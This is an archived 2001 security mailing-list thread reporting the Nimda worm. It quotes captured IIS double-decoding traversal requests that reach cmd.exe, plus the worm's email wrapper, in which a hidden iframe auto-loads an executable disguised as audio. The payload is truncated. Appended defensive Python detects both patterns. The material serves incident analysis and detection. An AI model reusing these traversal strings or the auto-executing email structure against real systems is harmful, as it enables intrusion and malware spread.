RE: New worm? 'readme.eml'

From: JKruser (jkruser@adelphia.net)
Date: 09/18/01


From: "JKruser" <jkruser@adelphia.net>
To: "Pedro Miller Rabinovitch" <pedro@cipher.com.br>, <forensics@securityfocus.com>
Subject: RE: New worm? 'readme.eml'
Date: Tue, 18 Sep 2001 12:54:31 -0400
Message-ID: <NDBBJDPCMMJOCGOGCHPHKEKKEGAA.jkruser@adelphia.net>

09/18/01
Virus Alert

Be on the alert for an email-borne virus with the following characteristics:

Name of attachment: README.EXE

Description:
This is the preliminary information known at this time.
There is a new mass-mailing worm that utilizes email to propagate itself.
The threat arrives as readme.exe in an email.

In addition, the worm sends out probes to IIS servers attempting to spread
by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm.
Compromised servers may display a webpage prompting a visitor to download an
Outlook file which contains the worm as an attachment.

Also, the worm will create an open network share allowing access to the
system. The worm will also attempt to spread via open network shares.

For more information refer to:
(Aliases: W32.Nimda.A@mm, W32/Nimda-A)

Sophos:
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec:
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

Claymore
the unprofound

-----Original Message-----
From: Pedro Miller Rabinovitch [mailto:pedro@cipher.com.br]
Sent: Tuesday, September 18, 2001 11:14 AM
To: forensics@securityfocus.com
Cc: Cory McIntire; focus-ms@securityfocus.com;
focus-ids@securityfocus.com
Subject: New worm? 'readme.eml'

Hi,

   is this CodeBlue? Some new worm? Or just one I hadn't heard about?
It uses double-encoding exploits, and propagates both by adding
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date Time D Source IP Sport Dport P
01Sep18 11:20 T 200.192.226.40 3933 80 T
01Sep18 11:20 T 200.192.226.40 3767 80 T
01Sep18 11:20 T 200.192.226.40 3572 80 T

  SOURCE: 200.192.226.40

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx  E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00  ...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx  E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00  ...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35  GET /_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35  c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63  c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31  md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e  .0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a           ection: close....

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx  E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00  .].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e  GET /msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e  /..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e  .%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79  /..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69  stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77  r HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73  w..Connnection: clos
  65 0d 0a 0d 0a                                               e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I
saw the normal web page for the institution, plus a pop-up window for
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
follows:

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,

        Pedro.

--
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br
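As an added illustration (not part of this thread), here is defender-side Python that canonicalizes a request path the way the double-decoding and overlong-UTF-8 bugs in the probes above were abused, and flags the indicators in the three request lines recovered from the packet dump. The decoding rules are a simplified model of the server behaviour assumed for illustration, not Microsoft's code; the sample request lines are transcribed from the dump.

```python
import re

HEX2 = re.compile(rb"%([0-9A-Fa-f]{2})")

def decode_once(path: bytes) -> bytes:
    """One round of %XX decoding, then the lenient two-byte UTF-8 folding that
    turned overlong forms such as %c0%af and %c1%1c into '/' and '\\'."""
    raw = HEX2.sub(lambda m: bytes([int(m.group(1), 16)]), path)
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):  # overlong lead byte
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def canonicalize(uri_path: str):
    """Decode twice (%255c -> %5c -> '\\'), then resolve '.' and '..' with '/'
    and '\\' treated alike. Returns the surviving segments and how many '..'
    climbed above the web root."""
    p = decode_once(decode_once(uri_path.encode("latin-1")))
    segs, escapes = [], 0
    for seg in re.split(rb"[/\\]+", p):
        if seg == b"..":
            if segs: segs.pop()
            else: escapes += 1
        elif seg and seg != b".":
            segs.append(seg.decode("latin-1").lower())
    return segs, escapes

def classify_request(request_line: str) -> dict:
    """Flag the traversal indicators present in one HTTP request line."""
    path = request_line.split()[1].split("?", 1)[0]
    segs, escapes = canonicalize(path)
    checks = [("double-encoded %", "%25" in path.lower()),
              ("overlong utf-8", bool(re.search(r"%c[01]%", path, re.I))),
              ("escapes web root", escapes > 0),
              ("cmd.exe", "cmd.exe" in segs)]
    return {"path": "/".join(segs), "escapes": escapes,
            "flags": [name for name, hit in checks if hit]}

# Constructed input: the three request lines recovered from the packet dump above.
SAMPLES = [
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
]
```

Running `classify_request` over each line in `SAMPLES` shows every probe resolving to winnt/system32/cmd.exe after climbing above the web root, which is the signature an IDS rule or web-log review should key on rather than the literal encoded string.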

----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
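Added example, not from the original post: parsing a message with the structure of the readme.eml quoted above using Python's standard email module to surface the two traits that make it dangerous, a zero-size iframe that pulls another MIME part by cid:, and a part declared as audio/x-wav whose name and MZ magic say it is an executable. The sample message is constructed from the headers quoted in the thread, with a 16-byte PE header stub as the only body.

```python
import base64, email, re
from email import policy
# Constructed sample mirroring the readme.eml quoted above; the base64 body
# is only the first 16 bytes of a PE/DOS header, not the worm.
MZ_STUB = base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00").decode()
SAMPLE_EML = f"""MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{MZ_STUB}
--====_ABC1234567890DEF_====--
"""
IFRAME = re.compile(r'<iframe\b[^>]*\bsrc=["\']?cid:([^\s"\'>]+)[^>]*>', re.I)

def is_hidden(tag: str) -> bool:
    # Both dimensions declared as 0: the frame renders nothing but still loads its src.
    return all(re.search(rf'\b{a}=["\']?0\b', tag, re.I) for a in ("height", "width"))

def audit_message(raw: str) -> dict:
    """Report zero-size cid: iframes and bodies whose declared type hides an executable."""
    msg = email.message_from_string(raw, policy=policy.default)
    hidden_cids, executables = [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            hidden_cids += [m.group(1) for m in IFRAME.finditer(part.get_content()) if is_hidden(m.group(0))]
            continue
        name, body = part.get_filename() or "", part.get_payload(decode=True) or b""
        if name.lower().endswith(".exe") or body.startswith(b"MZ"):  # name or magic says PE
            executables.append({"name": name, "declared_type": part.get_content_type(), "mz_magic": body.startswith(b"MZ"),
                                "content_id": (part.get("Content-ID") or "").strip("<>")})
    auto = any(e["content_id"] in hidden_cids for e in executables)
    return {"hidden_iframe_cids": hidden_cids, "executables": executables, "auto_executing": auto}
```

The decisive finding is the cross-reference: the Content-ID of the mislabelled executable is exactly the cid: the hidden iframe loads, so a mail gateway can reject on that pairing without any signature for the payload itself.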
